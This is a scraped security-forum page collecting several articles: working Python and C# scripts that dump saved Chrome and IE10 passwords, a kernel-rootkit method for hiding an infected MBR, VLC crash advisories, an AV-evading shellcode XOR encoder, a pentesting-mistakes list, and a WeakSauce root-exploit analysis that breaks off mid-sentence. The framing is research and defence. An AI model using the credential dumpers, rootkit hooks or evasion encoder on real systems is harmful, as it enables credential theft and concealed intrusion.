How Browsers Store Your Passwords (and Why You Shouldn't Let Them) Introduction In a previous post, I introduced a Twitter bot called dumpmon which monitors paste sites for account dumps, configuration files, and other information. Since then, I've been monitoring the information that is detected. While you can expect a follow-up post with more dumpmon-filled data soon, this post is about how browsers store passwords. I mention dumpmon because I have started to run across quite a few pastes like this that appear to be credential logs from malware on infected computers. It got me thinking - I've always considered it best to not have browsers store passwords directly, but why? How easy can it be for malware to pull these passwords off of infected computers? Since sources are a bit tough to find in one place, I've decided to post the results here, as well as show some simple code to extract passwords from each browser's password manager. The Browsers For this post, I'll be analyzing the following browsers on a Windows 8 machine. Here's a table of contents for this post to help you skip to whatever browser you're interested in: Chrome 27.0.1453.110 IE 10 Firefox 21.0 [TABLE=class: tr-caption-container] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Logos by Paul Irish [/TD] [/TR] [/TABLE] Chrome Difficulty to obtain passwords:Easy Let's start with Chrome. Disappointingly, I found Chrome to be the easiest browser to extract passwords from. The encrypted passwords are stored in a sqlite database located at "%APPDATA%\..\Local\Google\Chrome\User Data\Default\Login Data". But how do they get there? And how is it encrypted? I got a majority of information about how passwords are stored in Chrome from this article written over 4 years ago. Since a bit has changed since then, I'll follow the same steps to show you how passwords are handled using snippets from the current Chromium source (or you just skip straight to the decryption). Encryption and Storing Passwords When you attempt to log into a website, Chrome first checks to see if it was a successful login: We can see that if it's a successful login, and you used a new set of credentials that the browser didn't generate, Chrome will display a bar asking if you want your password to be remembered: To save space, I'm omitting the code that creates the Save Password bar. However, if we click "Save password", the Accept function is called, which in turn calls the "Save" function of Chrome's password manager : Easy enough. If it's a new login, we need to save it as such: Again to save space, I've snipped a bit out of this (a check is performed to see if the credentials go to a Google website, etc.). After this function is called, a task is scheduled to perform the AddLoginImpl() function. This is to help keep the UI snappy: This function attempts to call the AddLogin() function of the login database object, checking to see if it was successful. Here's the function (we're about to see how passwords are stored, I promise!): Now we're getting somewhere. We create an encrypted string out of our password. I've snipped it out, but below the "sql::Statement" line, a SQL query is performed to store the encrypted data in the Login Data file. The EncryptedString function simply calls the EncryptString16 function on an Encryptor object (this just calls the following function below): Finally! We can finally see that the password given is encrypted using a call to the Windows API function CryptProtectData. This means that the password is likely to only be recovered by a user with the same logon credential that encrypted the data. This is no problem, since malware is usually executed within the context of a user. Decrypting the Passwords Before talking about how to decrypt the passwords stored above, let's first take a look at the Login Data file using a sqlite browser. Our goal will be to extract the action_url, username_value, and password_value (binary, so the SQLite browser can't display it) fields from this database. To decrypt the password, all we'll need to do is make a call to the Windows API CryptUnprotectData function. Fortunately for us, Python has a great library for making Windows API calls called pywin32. Let's look at the PoC: [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] [/TD] [TD=class: line-data] #The MIT License (MIT) # Copyright © 2012 Jordan Wright <jordan-wright.github.io> # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from os import getenv import sqlite3 import win32crypt # Connect to the Database conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data") cursor = conn.cursor() # Get the results cursor.execute('SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): # Decrypt the Password password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] if password: print 'Site: ' + result[0] print 'Username: ' + result[1] print 'Password: ' + password [/TD] [/TR] [/TABLE] view raw chrome_extract.py hosted with ? by GitHub And, by running the code, we see we are successful! While it was a bit involved to find out how the passwords are stored (other dynamic methods could be used, but I figured showing the code would be most thorough), we can see that not much effort was needed to actually decrypt the passwords. The only data that is protected is the password field, and that's only in the context of the current user. Internet Explorer Difficulty to obtain passwords:Easy/Medium/Hard (Depends on version) Up until IE10, Internet Explorer's password manager used essentially the same technology as Chrome's, but with some interesting twists. For the sake of completeness, we'll briefly discuss where passwords are stored in IE7-IE9, then we'll discuss the change made in IE10. Internet Explorer 7-9 In previous versions of Internet Explorer, passwords were stored in two different places, depending on the type of password. Registry (form-based authentication) - Passwords submitted to websites such as Facebook, Gmail, etc. Credentials File - HTTP Authentication passwords, as well as network login credentials For the sake of this post, we'll discuss credentials from form-based authentication, since these are what an average attacker will likely target. These credentials are stored in the following registry key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 Looking at the values using regedit, we see something similar to the following: As was the case with Chrome, these credentials are stored using Windows API function CryptProtectData. The difference here is that additional entropy is provided to the function. This entropy, also the registry key, is the SHA1 checksum of the URL (in unicode) of the site for which the credentials are used. This is beneficial because when a user visits a website IE can quickly determine if credentials are stored for it by hashing the URL, and then using that hash to decrypt the credentials. However, if an attacker doesn't know the URL used, they will have a much harder time decrypting the credentials. Attackers will often be able to mitigate this protection by simply iterating through a user's Internet history, hashing each URL, and then checking to see if any credentials have been stored for it. While I won't paste the entire code here, you can find a great example of a full PoC here. For now, let's move on to IE10. Internet Explorer 10 Note: Please refer to the comment below by Amy Adams regarding the fact that Windows Store Apps cannot access stored credentials in the way described above. However, this method is still relevant for applications running in the context of the user. IE10 changed the way it stores passwords. Now, all autocomplete passwords are stored in the Credential Manager in a location called the "Web Credentials". It looks something like the following: To my knowledge (I wasn't able to find much information on this), these credential files are stored in %APPDATA%\Local\Microsoft\Vault\[random]. A reference to what these files are, and the format used could be found here. What I do know is that it wasn't hard to obtain these passwords. In fact, it was extremely easy. Microsoft recently provided a new Windows runtime for more API access. This runtime provides access to a Windows.Security.Credentials namespace which provides all the functionality we need to enumerate the user's credentials. In fact, here is a short PoC C# snippet which, when executed in the context of a user, will retrieve all the stored passwords: [TABLE=class: lines highlight] [TR] [TD=class: line-numbers] [/TD] [TD=class: line-data] /*The MIT License (MIT) Copyright © 2012 Jordan Wright <jordan-wright.github.io> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.*/ using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using Windows.Security.Credentials; namespace PasswordVaultTest { class Program { static void Main(string[] args) { // Create a handle to the Widnows Password vault Windows.Security.Credentials.PasswordVault vault = new PasswordVault(); // Retrieve all the credentials from the vault IReadOnlyList<PasswordCredential> credentials = vault.RetrieveAll(); // The list returned is an IReadOnlyList, so there is no enumerator. // No problem, we'll just see how many credentials there are and do it the // old fashioned way for (int i = 0; i < credentials.Count; i++) { // Obtain the credential PasswordCredential cred = credentials.ElementAt(i); // "Fill in the password" (I wish I knew more about what this was doing) cred.RetrievePassword(); // Print the result Console.WriteLine(cred.Resource + ':' + cred.UserName + ':' + cred.Password); } Console.ReadKey(); } } } [/TD] [/TR] [/TABLE] view raw ie_extract.cs hosted with ? by GitHub When executing the program, the output will be similar to this: Note: I removed some sites that I believe came from me telling IE not to record. Other than that, I'm not sure how they got there. As you can see, it was pretty trivial to extract all the passwords in use from a given user, as long as our program is executing in the context of the user. Moving right along! Firefox Difficulty to obtain passwords:Medium/Very Hard Next let's take a look at Firefox, which was tricky. I primarily used these slides (among a multitude of other resources) to find information about where user data is stored. But first, a little about the crypto behind Firefox's password manager. Mozilla developed a open-source set of libraries called "Network Security Services", or NSS, to provide developers with the ability to create applications that meet a wide variety of security standards. Firefox makes use of an API in this library called the "Secret Decoder Ring", or SDR, to facilitate the encryption and decryption of account credentials. While it may have a "cutesy name", let's see how it's used by Firefox to provide competitive crypto: When a Firefox profile is first created, a random key called an SDR key and a salt are created and stored in a file called "key3.db". This key and salt are used in the 3DES (DES-EDE-CBC) algorithm to encrypt all usernames and passwords. These encrypted values are then base64-encoded, and stored in a sqlite database called signons.sqlite. Both the "signons.sqlite" and "key3.db" files are located at %APPDATA%/Mozilla/Firefox/Profiles/[random_profile]. So what we need to do is to get the SDR key. As explained here, this key is held in a container called a PKCS#11 software "token". This token is encapsulated inside of a PKCS#11 "slot". Therefore, to decrypt the account credentials, we need to access this slot. But there's a catch. This SDR key itself is encrypted using the 3DES (DES-EDE-CBC) algorithm. The key to decrypt this value is the hash of what Mozilla calls a "Master Password", paired with another value found in the key3.db file called the "global salt". Firefox users are able to set a Master Password in the browser's settings. The problem is that many users likely don't know about this feature. As we can see, the entire integrity of a user's account credentials hinges on the complexity of chosen password that's tucked away in the security settings, since this is the only value not known to the attacker. However, it can also been that if a user picks a strong Master Password, it is unlikely that an attacker will be able to recover the stored credentials. Here's the thing - if a user doesn't set a Master Password, a null one ("") is used. This means that an attacker could extract the global salt, hash it with "", use that to decrypt the SDR key, and then use that to compromise the user's credentials. Let's see what this might look like: To get a better picture of what's happening, let's briefly go to the source. The primary function responsible for doing credential decryption is called PK11SDR_Decrypt. While I won't put the whole function here, the following functions are called, respectively: PK11_GetInternalKeySlot() //Gets the internal key slot PK11_Authenticate() //Authenticates to the slot using the given Master Password PK11_FindFixedKey() //Gets the SDR key from the slot pk11_Decrypt() //Decrypts the base64-decoded data using the found SDR key As for example code to decrypt the passwords, since this process is a bit involved, I won't reinvent the wheel here. However, here are two open-source projects that can do this process for you: FireMaster - Brute forces master passwords ffpasscracker - I promised you Python, so here's a solution. This uses the libnss.so library as a loaded DLL. To use this on Windows, you can use these cygwin DLL's. Conclusion I hope this post has helped clarify how browsers store your passwords, and why in some cases you shouldn't let them. However, it would be unfair to end the post saying that browsers are completely unreliable at storing passwords. For example, in the case of Firefox, if a strong Master Password is chosen, account details are very unlikely to be harvested. But, if you would like an alternative password manager, LastPass, KeePass, etc. are all great suggestions. You could also implement two-factor authentication using a device such as a YubiKey. As always, please don't hesitate to let me know if you have any questions or suggestions in the comments below. - Jordan (@jw_sec) Posted by Jordan at 10:08 PM Sursa: http://raidersec.blogspot.ca/2013/06/how-browsers-store-your-passwords-and.html
-
The common mistakes every newbie pentester makes Dec 23, 2014 by Steve Lord In Penetration Testing. Every penetration tester goes through several rites of passage on their path from lowly nessus monkey to experienced pentester. I wouldn’t say that these are my favourites but they are surprisingly common. How many have you checked off the list? Not being prepared Whether it’s a product of laziness or just being on back to back gigs for weeks on end, at some point (usually now and again) a pentester goes on-site completely unprepared for the task at hand. Is it unprofessional? Yes, of course. Does it happen? Yes, of course. There are different forms of not being prepared, from simply not running the latest software updates through to the catastrophic situation of having pretty much zero knowledge of the test ahead and none of the equipment. How well you handle this is something that will pretty much define your success as a tester. Normally it’s the client that’s unprepared, so on that one occasion the customer has everything ready to go and you’re still trying to find the proposal in your email somewhere is usually the time where everything goes wrong in the worst possible way. The very worst form of not being prepared is when you’re perfectly prepared and something truly horrible happens like a a last minute update hosing your entire build. There’s a reason that we freeze all but critical updates days before a penetration test at Mandalorian, and that reason is the very bitter voice of experience itself. Dressing incorrectly on site Most pentesters will either wear a suit on-site or will wear something more casual for the server room like a polo shirt, black trousers and shoes. Occasionally there’s a pentester who’ll turn up in something wholly inappropriate like a tracksuit, or even worse. I consider this a variant of not being prepared, but there’s nothing like the feeling of getting up early waiting for Asda to open so you can buy the least skankiest suit available before going on-site because you left your luggage hundreds of miles away at home. Yes, this happened to me. Not getting to know their tools Everyone hates on Nessus, it’s a given. Everyone thinks Nmap is the best port scanner (which is only true for certain values of best, not all). Everyone hates on Windows, except for the people who hate on OSX more. At Mandalorian everyone hates on Libreoffice. Except me. I took the time to learn how to use it the Libreoffice way. Having said that, I’m not immune. The other day I was writing 3,000 words on traceroute for Breaking In and found out for the first time that most Unix traceroute implementations now support TCP static port traceroutes out of the box, after over 10 years of using the excellent Hping instead. Time spent learning how to get more from your existing tools is usually returned in spades. Not storing evidence So you’ve hacked the AD to shreds, compromised every aspect of the environment and left the place in total disarray. Great stuff. Now when you come to start writing up findings you notice something… missing. Before you know it you’re reliant on things you remembered but didn’t write down and things you swore you wrote down but can’t find. At Mandalorian we have a standard file structure enshrined in our methodology specifically designed for the situation where someone gets hit by a bus and has to hand a gig over partway through. By keeping things in a standard location and logging as much practical information as possible you ensure that in six months time when asked about a finding you can give an accurate answer. Using scanner output in a report finding Don’t. Just don’t. At Mandalorian it’s viewed so dimly that it’s actually governed by the disciplinary procedure. Why? In every pentest you need to ask yourself, “What value am I adding here over and above an automated tool the end user could run themselves?” If the answer is none, then they should be running an automated tool themselves. You’re not an automated tool, you’re better than that. If you’re not, then you should be. Not providing references to further information Findings should be both concise and as detailed as they need to be. Understandably this can present a problem, the ideal solution to which is to point the reader elsewhere. At the very least you should use CVE references in infrastructure test reports, and either the OWASP Top 10 or something like CWE for web-based application tests. Scanning the wrong IP address We’ve all done this one. It happens. You put a dot in the wrong place or something goes the wrong way. Check before you start testing, check during testing and check your results before finishing testing. I like to store my target lists in a text file for infrastructure tests, then reference the file. That way I know I’m at worst getting it consistently wrong. Including your own system in the results It’s great when you have some critical findings for the report, but somewhat embarrassing when they turn out to be for your own system. Make sure whatever you take on-site is hardened, and don’t assume that you won’t be attacked while on-site. Closing/Crashing without saving If I could only pick a single entry in this list then this would be it, or possibly scanning the wrong IP address. It’s not uncommon to start writing something, go off and do something else, then come back and update. All too often though, something causes a process or the entire test system to fall over and you’re left hunting for swap files trying to find your test notes. Always save before executing anything that might fork out of control or generate serious load or i/o, but of course I’m preaching to the converted. Sursa: https://rawhex.com/2014/12/the-common-mistakes-every-newbie-pentester-makes/
-
[h=1]Using Kernel Rootkits to Conceal Infected MBR[/h] If you've look at any of the major bootkits such as TDL4 and Rovnix, you've probably noticed they employ certain self defense features to prevent removal; specifically, intercepting read/write requests to the boot sectors. While these defense mechanisms can fool some software, they may, in some cases, make infections even easier to spot. Rovnix is probably the less stealthy of the two: It intercepts read/write requests to the boot disk by hooking the miniport driver, on read attempts it fills the buffer with zeros, resulting in the boot sectors appearing completely empty, on write requests it simply returns ACCESS_DENIED. Although this does prevent reading & writing the sectors, it's usually a sure sign of an infection when the boot sector is blank but your system boots, or you can't write the boot sector even with SYSTEM privileges. On the other had we have TDL4, which goes a step further: Instead of filling the buffer with zeros during read attempts, it instead replaces the read data with the original, non-infected master boot record (MBR). As a result of TDL4's clever trickery, any tools attempting to read the MBR will just see the original windows MBR and assume nothing is wrong; however, TDL4 also opted for a similar method to Rovnix by just denies writes to the boot sector, but with the slightly more inconspicuous error: STATUS_INVALID_DEVICE_REQUEST. Obviously straight up denying write requests to the boot sector is going to raise some questions, so what if we improved upon TDL4's method and also allowed writing to the spoofed, non-infected MBR, instead of the real one on disk. [h=2]Intercepting Disk I/O[/h] There's a lot of places in the kernel that disk I/O can be intercepted to trick user mode tools; however, any software using kernel drivers can bypass high level hooks. The first though would probably be to hook Disk.sys (the driver responsible for handling disk operations), but although this would work against some tools, there are trick to avoid it, I'll explain how. Disk.sys handles disk I/O, it doesn't actually send any requests to the hard drive, it simply acts as a middleman translating kernel disk I/O requests into SCSI requests (the protocol used to communicate with the hard drive). Once Disk.sys has translated a request, it dispatches it to another, lower level driver (known as a Miniport driver), in the form of an SCSI_REQUEST_BLOCK, which the Miniport sends to the hardware via the Port driver. The Miniport is generally operating system independent, whilst the port driver is specific to certain OS version and even hardware, making the Miniport the best place to hook without getting into hardware dependent territory. Finding a Miniport driver is pretty straight forward as all drivers/devices are stacked, so we simply walk down the device stack until we reach the bottom most device (The Miniport). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]2 identical device stacks for different disks[/TD] [/TR] [/TABLE] The device "\Device\HardDisk0\DR0" is almost always the boot disk and is the NT device name for "\\.\PhysicalDrive0". The device directly below the disk device is the Miniport and usually belongs to atapi.sys, scsiport.sys, iastor.sys (or in the case of vmware, lsi_sas.sys), this is the driver we want to hook. We can get the device object of the Miniport by opening "\Device\HardDisk0\DR0" then calling "IoGetLowerDeviceObject" with it, all we then need to do is replace the IRP_MJ_SCSI pointer in the driver's object with a pointer to our filter routine, which will intercept all I/O for that disk device. [h=2]Filtering Miniport Requests[/h] KeyIoStack = IO_STACK_LOCATION Srb = SCSI_REQUEST_BLOCK Cdb = CDB (SCSI Command Block) All the information we need is in the SCSI_REQUEST_BLOCK pointed to by IoStack->Parameters.Scsi.Srb, we only need to filter WRITE(10) and READ(10) SCSI operations on disks 2 TB or smaller ("Srb.CdbLength == 10"). Next we simply check the opcode in the Cdb for SCSIOP_READ or SCSIOP_READ_DATA_BUFF for read operations and similarly SCSIOP_WRITE or SCSIOP_WRITE_DATA_BUFF for write operations. Now we need to see if the request is attempting to read or write sectors that overlap the MBR, which is located at logical block address (LBA) 0, by checking the LogicalBlock and TransferLength field in the Cdb, (these values are big-endian so will need to be converted to little-endian before checking them). The driver will store the clean MBR into a buffer allocated at runtime, all read/write requests will be done to/from the clean MBR buffer, instead of the actual MBR on disk. Processing Intercepted Read Requests Set up a completion routine to be called after the hard disk has processed the read request. When the completion routine is called, map the caller's buffer (Irp->MdlAddress) into system memory and replace the infected mbr with the clean one in it. Allow the request to complete. Processing Intercepted Write Requests Write requests are a little different: If the caller is only trying to write 1 sector (just the MBR), we can process the request ourselves; however, if the caller is trying to write multiple sectors (including the MBR), things get a bit more tricky. Map the caller's buffer (Srb->DataBuffer) into system memory and read the first 512 bytes (1 sector) into the clean MBR buffer. Increment the caller's buffer (Srb->DataBuffer) by 512 bytes. Decrement the transfer length (Srb->DataTransferLength) by 512 bytes. Add 1 to the Logical Block Address (Stored in Cdb). Subtract 1 from the Number of blocks to transfer (Stored in Cdb). Pass the request to the real Miniport (this will write all the sectors the caller wanted, except the MBR). Replace the original Srb->DataBuffer (Just to be safe). If the call succeeded, add 512 to Srb->DataTransferLength (This is the number of bytes actually written to disk, because we skipped them MBR we need to make it seem like we didn't). Allow the request to complete. [h=2]Proof of Concept[/h] I've written a proof of concept driver that will make the MBR appear to contain the following text: Is this the real code? Is this just spoofed for me? bots trying to hide. Not sure of the legality. The system will be able to read/write to this fake MBR without modifying the real one, when the driver is unloaded or the system rebooted, the original MBR will still be intact and the face one will be gone. For some reason the driver will crash the system if loaded then unloaded many times in a row without reboot, but it's not a huge issue and I'm too lazy to debug. GitHub of code: https://github.com/MalwareTech/FakeMBR/ Sursa: Using Kernel Rootkits to Conceal Infected MBR | MalwareTech
-
VLC Media Player 2.1.5 Memory Corruption Vulnerabilities From: Veysel hata? <vhatas () gmail com> Date: Fri, 16 Jan 2015 14:28:45 +0200 Title : VLC Player 2.1.5 DEP Access Violation Vulnerability Discoverer: Veysel HATAS (@muh4f1z) Web page : Binary Sniper Vendor : VideoLAN VLC Project Test: Windows XP SP3 Status: Not Fixed Severity : High CVE ID : CVE-2014-9597 OSVDB ID : 116450 <http://osvdb.org/show/osvdb/116450> VLC Ticket : 13389 <https://trac.videolan.org/vlc/ticket/13389> Discovered : 24 November 2014 Reported : 26 December 2014 Published : 9 January 2015 windbglog : https://trac.videolan.org/vlc/attachment/ticket/13389/windbglog.txt <https://trac.videolan.org/vlc/attachment/ticket/13390/windbglog.txt> Description : VLC Media Player contains a flaw that is triggered as user-supplied input is not properly sanitized when handling a specially crafted FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. --------------------------------------------------------------------------------------------------------------------------------------------- Title : VLC Player 2.1.5 Write Access Violation Vulnerability Discoverer: Veysel HATAS (@muh4f1z) Web page : Binary Sniper Vendor : VideoLAN VLC Project Test: Windows XP SP3 Status: Not Fixed Severity : High CVE ID : CVE-2014-9598 OSVDB ID : 116451 <http://osvdb.org/show/osvdb/116451> VLC Ticket : 13390 <https://trac.videolan.org/vlc/ticket/13390> Discovered : 24 November 2014 Reported : 26 December 2014 Published : 9 January 2015 windbglog : https://trac.videolan.org/vlc/attachment/ticket/13390/windbglog.txt Description : VLC Media Player contains a flaw that is triggered as user-supplied input is not properly sanitized when handling a specially crafted M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. Sursa: Full Disclosure: VLC Media Player 2.1.5 Memory Corruption Vulnerabilities (CVE-2014-9597, CVE-2014-9597)
-
ShmooCon Firetalks 2015 These are the videos for the ShmooCon Firetalks 2015. Thanks to: NoVA Hackers! (NoVAH!) Opening - @grecs PlagueScanner: An Open Source Multiple AV Scanner Framework - Robert Simmons (@MalwareUtkonos) I Hunt Sys Admins - Will Schroeder (@harmj0y) Collaborative Scanning with Minions: Sharing is Caring - Justin Warner (@sixdub) Chronicles of a Malware Hunter - Tony Robinson (@da_667) SSH-Ranking - Justin Brand (@moo_pronto) Resource Public Key Infrastructure - Andrew Gallo (@akg1330) Sursa: http://www.irongeek.com/i.php?page=videos%2Fshmoocon-firetalks-2015
-
[h=1]Linux Commands for Penetration Testers[/h]A collection of hopefully useful Linux Commands for pen testers, this is not a complete list but a collection of commonly used commands + syntax as a sort of “cheatsheet”, this content will be constantly updated as I discover new awesomeness. Link: https://highon.coffee/docs/linux-commands/
-
Penetration testing - A Hands-On Introduction to Hacking San Francisco by Georgia Weidman About the Author Georgia Weidman is a penetration tester and researcher, as well as the founder of Bulb Security, a security consulting firm. She presents at conferences around the world including Black Hat, ShmooCon, and DerbyCon, and teaches classes on topics such as penetration testing, mobile hacking, and exploit development. Her work in mobile security has been featured in print and on television internationally. She was awarded a DARPA Cyber Fast Track grant to continue her work in mobile device security. Brief Contents Foreword by Peter Van Eeckhoutte xix Acknowledgments . xxiii Introduction xxv Chapter 0: Penetration Testing Primer 1 Part I: The Basics Chapter 1: Setting Up Your Virtual Lab 9 Chapter 2: Using Kali Linux 55 Chapter 3: Programming . 75 Chapter 4: Using the Metasploit Framework . 87 Part II: Assessments Chapter 5: Information Gathering . 113 Chapter 6: Finding Vulnerabilities 133 Chapter 7: Capturing Traffic 155 Part III: Attacks Chapter 8: Exploitation 179 Chapter 9: Password Attacks 197 Chapter10: Client-Side Exploitation . 215 Chapter 11: Social Engineering 243 Chapter 12: Bypassing Antivirus Applications 257 Chapter 13: Post Exploitation 277 Chapter 14: Web Application Testing 313 Chapter 15: Wireless Attacks 339 viii Brief Contents ? Part IV: Exploit Development Chapter 16: A Stack-Based Buffer Overflow in Linux . 361 Chapter 17: A Stack-Based Buffer Overflow in Windows 379 Chapter 18: Structured Exception Handler Overwrites 401 Chapter 19: Fuzzing, Porting Exploits, and Metasploit Modules 421 Part V: Mobile Hacking Chapter 20: Using the Smartphone Pentest Framework . 445 Resources . 473 Index . 477 Download: http://www.caluniv.ac.in/free_book/Cyber-Security/Penetration%20Testing%20A%20Hands-On%20Introduction%20to%20Hacking.pdf Nota: Autorul este o tipa. :->
- 1 reply
-
- 1
-
-
SLAE: Custom RBIX Shellcode Encoder/Decoder Anti-Virus and Intrusion Detection Systems could become really nasty during a penetration test. They are often responsible for unstable or ineffective exploit payloads, system lock-downs or even angry penetration testers . The following article is about a simple AV and IDS evasion technique, which could be used to bypass pattern-based security software or hardware. It’s not meant to be an all-round solution for bypassing strong heuristic-based systems, but it’s a good starting point to further improve these encoding/obfuscation technique. Therefore this article covers shellcode encoders and decoders in my SecurityTube Linux Assembly Expert certification series. Random-Byte-Insertion-XOR Encoding Scheme The encoding scheme itself is actually quite easy. The idea is to take a random byte as the base for a XOR operation, and to chain the next XOR operation based on the result of the previous. The same goes for the 3rd and 4th byte. The following flow-graph quickly describes what’s happening during the encoding process: First of all (before step #1 is performed), the encoder splits the input shellcode into multiple blocks with a length of 3 bytes each and adds a random byte (value 0x01 to 0xFF) at the beginning of each of those blocks, so that these random bytes differ from block to block. If the shellcode is not aligned to these 3 byte-blocks, an additional NOP-padding (0x90) is added to the last block. During the second step, the encoder XORs the first (the random byte) with the second byte (this is originally the first byte of the shellcode) and overwrites the second byte with the XOR result. The third step takes the result from the first XOR operation and XORs it again with the third byte, and the last step does the same and XORs the result of the previous XOR operation with the last byte of the block. This results in a completely shredded-looking piece of memory Articol complet: https://www.rcesecurity.com/2015/01/slae-custom-rbix-shellcode-encoder-decoder/
-
Analyzing the WeakSauce Exploit Jonathan Levin, Redirecting you to main page.. As part of the devices I researched for my upcoming book on Android Internals, I got myself an HTC One M8. A chief factor in my decision was knowing that it had a working 1-click root, since I didn't want to root it using a bootloader unlock (which would ruin the prospects of selling it on eBay once I'm done). The exploit for the One M8 is called WeakSauce, and has been published on XDA Developers by members jcase (who discovered the vulnerability) and beaups (who helped exploit it). It's packaged as a simple APK, which you can download and push to the device, but I couldn't find much documentation on how it works, though it had been classified as an HTC specific vulnerability, and not a generic one in KitKat. Since I have a chapter dealing with security, it made sense to try and figure out exactly what the exploit is doing. This article was created to detail the process, and is written as a tutorial. Going along, I hope to publish more of these articles as updates to the book, as I have with the OS X/iOS book. Step I: Examine the APK Getting the APK is a simple enough matter, as it is freely and readily downloadable. After getting it, we can unzip to examine its contents: morpheus@Ergo (~/tmp)$ unzip -l WeakSauce-1.0.1.apk Archive: ../../WeakSauce-1.0.1.apk Length Date Time Name -------- ---- ---- ---- 630 03-30-14 10:20 META-INF/MANIFEST.MF 751 03-30-14 10:20 META-INF/TIMEPINK.SF 912 03-30-14 10:20 META-INF/TIMEPINK.RSA 853044 03-30-14 10:19 assets/busybox 52428800 03-30-14 10:19 assets/xbin.img 3067 03-30-14 10:19 res/drawable/ic_launcher.png 652 03-30-14 10:20 res/layout/activity_main.xml 464 03-30-14 10:20 res/menu/main.xml 2840 03-30-14 10:20 AndroidManifest.xml 1852 03-30-14 10:19 resources.arsc 705756 03-30-14 10:19 classes.dex -------- ------- 53998768 11 files As the above shows, the APK has no JNI functionality (otherwise it would have a lib/ subfolder). The only "unusual" thing about it are the assets - the APK packages busybox (the all-in-one-binary, statically compiled) and an image of xbin (An ext4 loopback mount image). The manifest is also quite simple (I XMLized the relevant portions): morpheus@Ergo (~/tmp)$ aapt d xmltree WeakSauce-1.0.1.apk AndroidManifest.xml | xmlize <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.cunninglogic.weaksauce" android:versionCode="1" android:versionName="1.0.1"> ... <uses-permission android:name="android.permission.INTERNET"> <uses-permission android:name="android.permission.BLUETOOTH"> <uses-permission android:name="android.permission.BLUETOOTH_ADMIN"> <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"> <application ...> .. <intent-filter> <action android:name="android.intent.action.BOOT_COMPLETED" /> <action android:name="android.intent.action.QUICKBOOT_POWERON" /> </intent-filter> </receiver> </application> </manifest> The only thing that's intriguing is why WeakSauce needs BlueTooth permissions. This will be explained shortly. Step II: dexter The dexter is a simple DEX file parser and extractor I wrote as an appendix to Chapter 10 of the book, which deals with the internals of the Dalvik VM. The tool is an improvement on the well known dexdump utility, in that it is more Java-aware, and can also perform some decompilation. Using it to dump the classes revealed some 521 classes, of which the vast majority were Android support classes - so these could be outright ignored. morpheus@Ergo (~/tmp)$ dexter --classes classes.dex | grep -v " android" Class Defs: 521 bytes @0x17540 Class 343: Package: com.cunninglogic.weaksauce Class: D; (y) Class 344: Package: com.cunninglogic.weaksauce Class: G; (y) Class 345: Package: com.cunninglogic.weaksauce Class: H; (y) Class 346: Package: com.cunninglogic.weaksauce Class: J; (l) Class 347: Package: com.cunninglogic.weaksauce Class: K; (v) Class 348: Package: com.cunninglogic.weaksauce Class: M; (y) Class 349: Package: com.cunninglogic.weaksauce Class: MainActivity; (v) Class 350: Package: com.cunninglogic.weaksauce Class: OnBootReceiver; (w) Class 351: Package: com.cunninglogic.weaksauce Class: Weak; (f) Class 352: Package: com.cunninglogic.weaksauce Class: b; (y) Class 353: Package: com.cunninglogic.weaksauce Class: c; (v) Class 354: Package: com.cunninglogic.weaksauce Class: f; (y) Class 355: Package: com.cunninglogic.weaksauce Class: i; (y) Class 356: Package: com.cunninglogic.weaksauce Class: j; (y) Class 357: Package: com.cunninglogic.weaksauce Class: k; (y) Class 358: Package: com.htc.engine.system Class: SystemAccess ® morpheus@Ergo (~/tmp)$ dexter --extract com.cunninglogic.weaksauce classes.dex Extracting all classes belonging to com.cunninglogic.weaksauce Package... 15 Classes extracted. morpheus@Ergo (~/tmp)$ dexter --extract "com.htc*" classes.dex Extracting all classes matching "com.htc*" 1 Class extracted. Aside from the android support classes, which are nothing special), only has the com.cunninglogic.weaksauce package classes - obfuscated, as is readily seen from the class names - and the com.htc.engine.system.SystemAccess.class - which is a replacement class for 